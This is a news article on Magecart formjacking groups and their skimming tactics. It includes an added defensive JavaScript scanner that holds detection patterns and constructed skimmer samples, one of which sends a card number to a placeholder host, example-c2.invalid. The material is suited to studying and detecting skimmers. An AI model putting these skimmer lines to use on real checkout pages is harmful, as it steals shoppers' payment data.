Magecart can no longer be considered the work of a single cybercrime group, but rather, an e-commerce security threat category in its own right

When Magecart first appeared on the scene with the breach of payment websites belonging to household names including British Airways, Ticketmaster, Sotheby’s, Newegg, and Cathay Pacific, many believed it was the work of a single group with a predilection for credit card skimmers.

In a technique known as ‘formjacking’, Magecart attackers exploit vulnerabilities in websites built on e-commerce backend systems such as Magento to inject checkout pages with malicious code that skims and steals payment card data.

This information is then whisked away to a command and control (C2) server, where it may be moved on and sold in underground markets or used to conduct fraudulent transactions online.

Symantec says that more than 4,800 websites are compromised through formjacking every month. One-third of all detections occur during the holiday shopping season.

With high-profile enterprise companies becoming lucrative sources for stolen data, cybercriminals want to cash in – and the Magecart technique is proving popular.

According to a new report released today (August 28) by Aite Group and Arxan, Magecart should now be considered an umbrella term, under which many different groups are operating.

RiskIQ and Flashpoint said in November that at least seven groups were in operation, which later rose to nine. It is now believed that at least 10 Magecart entities are involved in financial data theft.

“Magecart has gone from relative obscurity to dominating national headlines and ascending to the top of the e-commerce industry’s most-wanted list,” Aite says.

“While it originated back in 2015 as the name of a group installing skimmers on e-commerce sites, it’s now being used for anonymity by multiple groups that use the same tactics but different techniques.”

Aite Group used a source code search engine to scour the web for JavaScript indicators of compromise in e-commerce websites. In total, 80 new victim organizations have been discovered worldwide.

Infected servers were sending skimmed card details to cyberattackers and, in some cases, more than one group had managed to compromise the same website.

The increase in formjacking has resulted in some Magecart groups evolving their tactics beyond basic, vulnerability-based infection.

Malicious JavaScript code is now being obfuscated through Base64, XML, or Hex encoding. Code signing is also coming into play, and some threat groups now time their attacks to prevent discovery until it is too late.
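The kind of JavaScript indicator search Aite Group describes, and the Base64/hex obfuscation noted above, can be illustrated with a small defender-side heuristic. The following is an added example, not code from the article or from Aite Group: it flags scripts that reference payment fields and contain an exfiltration primitive, after decoding long Base64 or hex string literals so encoded keywords are still visible. All three sample scripts are constructed, the `unhex` helper in the obfuscated sample is hypothetical, and `example-c2.invalid` is a placeholder host.

```javascript
// Payment-field names and exfiltration primitives that, together, are
// typical of a skimmer but rare in legitimate checkout code.
const PAYMENT_TERMS = /card|cvv|cvc|expir|cc_?num|billing/i;
const EXFIL_TERMS = /XMLHttpRequest|fetch\(|sendBeacon|new Image\(|\.src\s*=/;
const FORM_HOOK = /addEventListener\s*\(\s*["'](?:submit|keyup|change)["']/;

// Pull out long quoted literals that look like Base64 or hex and decode them,
// so the keyword checks also see what the encoding hides. A Base64 string
// made only of hex characters is treated as hex; fine for a heuristic.
function decodeLiterals(src) {
  const decoded = [];
  for (const m of src.matchAll(/["']([A-Za-z0-9+/=]{16,})["']/g)) {
    const lit = m[1];
    if (/^(?:[0-9a-fA-F]{2})+$/.test(lit)) decoded.push(Buffer.from(lit, "hex").toString("utf8"));
    else decoded.push(Buffer.from(lit, "base64").toString("utf8")); // lenient decode
  }
  return decoded;
}

// Findings for one script; "suspicious" requires both a payment-field
// reference and an exfiltration primitive, in plain or decoded text.
function scanScript(src) {
  const decoded = decodeLiterals(src);
  const view = src + "\n" + decoded.join("\n");
  const findings = [];
  if (decoded.length) findings.push("encoded-literals");
  if (PAYMENT_TERMS.test(view)) findings.push("payment-fields");
  if (EXFIL_TERMS.test(view)) findings.push("exfil-primitive");
  if (FORM_HOOK.test(view)) findings.push("form-hook");
  const suspicious = findings.includes("payment-fields") && findings.includes("exfil-primitive");
  return { suspicious, findings, decoded };
}

// Constructed samples (not real skimmer code). example-c2.invalid is a placeholder.
const benign = `document.getElementById("promo").addEventListener("click", () => {
  fetch("/api/promo").then(r => r.json()).then(render); });`;
const plainSkimmer = `document.querySelector("form").addEventListener("submit", () => {
  const n = document.querySelector("input[name=cc_number]").value;
  new Image().src = "https://example-c2.invalid/?d=" + btoa(n); });`;
const encSel = Buffer.from("input[name=cc_number]").toString("base64");
const encUrl = Buffer.from("https://example-c2.invalid/collect").toString("hex");
const obfuscated = `var s = document.querySelector(atob("${encSel}"));
fetch(unhex("${encUrl}"), { method: "POST", body: s.value });`; // unhex is hypothetical

for (const [name, src] of Object.entries({ benign, plainSkimmer, obfuscated })) {
  const r = scanScript(src);
  console.log(name, r.suspicious ? "SUSPICIOUS" : "ok", r.findings.join(","));
}
```

Such keyword heuristics only catch the obfuscation styles they decode; they are a triage aid for script inventories, not a substitute for integrity controls on what a checkout page is allowed to load.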

Magecart credit card skimmers have also recently been found in Amazon S3 buckets, leading to the compromise of thousands of websites through so-called ‘spray and pray’ tactics. In a recent case documented by Malwarebytes, the website of the Poker Tracker software suite was running a vulnerable, outdated version of Drupal that was targeted by Magecart.

This may indicate that attackers using the Magecart technique are expanding beyond Magento to include other e-commerce systems.

Speaking to The Daily Swig, Jérôme Segura, director of threat intelligence at Malwarebytes, said that we should expect Magecart to encompass more techniques to both attack and avoid detection in the future.

“We should remember that web skimmers have existed for a long time and that the client-side artifacts we see these days could be replaced by server-side operations,” Segura says.

“For now, there are many JavaScript skimming kits available and this seems to be what threat actors are most comfortable to go with. It’s also opened the playing field to more criminals who might not have had previous experience with e-commerce platforms.”
